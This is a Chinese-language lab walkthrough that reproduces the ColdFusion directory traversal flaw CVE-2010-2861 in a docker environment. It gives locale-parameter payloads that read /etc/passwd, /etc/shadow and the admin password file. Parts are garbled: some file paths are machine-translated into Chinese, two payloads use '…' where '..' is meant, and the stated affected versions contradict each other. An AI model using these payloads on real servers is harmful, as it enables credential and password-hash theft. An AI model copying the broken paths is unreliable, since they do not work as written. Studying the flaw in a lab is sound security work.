Adobe ColdFusion文件读取漏洞(CVE-2010-2861)
0x01漏洞概述
Adobe ColdFusion是由J. J. Allaire于1995年创建的商业快速Web应用程序开发计算平台。
Adobe ColdFusion 9.0.1 及更早版本中存在一个目录遍历漏洞,允许远程攻击者通过区域设置参数读取任意文件,以
(1) CFIDE/administrator/settings/mappings.cfm
(2) 日志记录/设置.cfm
(3) 数据源/索引.cfm
(4) j2eepackaging/editarchive.cfm
(5) 在 CFIDE/administrator/ 中输入.cfm
0x02影响版本
Adobe CouldFusion 8.0.1版本
0x03漏洞复现
(1)打开靶场环境
docker-compose up -d
漏洞环境比较大,建议在网络好的情况下打开。
(2) 访问漏洞
环境启动以后访问一下路径,然后输入admin:
http://IP地址:8500/CFIDE/administrator/
成功访问
(3)读取文件/etc/passwd
访问该路径:
http://IP地址:8500/CFIDE/administrator/enter.cfm?locale=%E2%80%A6/%E2%80%A6/%E2%80%A6/%E2%80%A6/%E2%80%A6/%E2%80%A6/%E2%80%A6/%E2%80%A6/%E2%80%A6/%E2%80%A6/etc/passwd%00en
利用burp进行抓包:
发送到重发器,删除cookie值后可以读取文件/etc/passwd
成功读取文件/etc/passwd。
(4)读取文件/etc/shadow
修改请求包,然后读取文件/etc/shadow。
访问路径如下:
/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/shadow%00en
(5) 读取后台管理员密码
访问路径如下:
/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/lib/password.properties%00en
成功读取后台管理员密码。
(6)关闭靶场环境
docker-compose down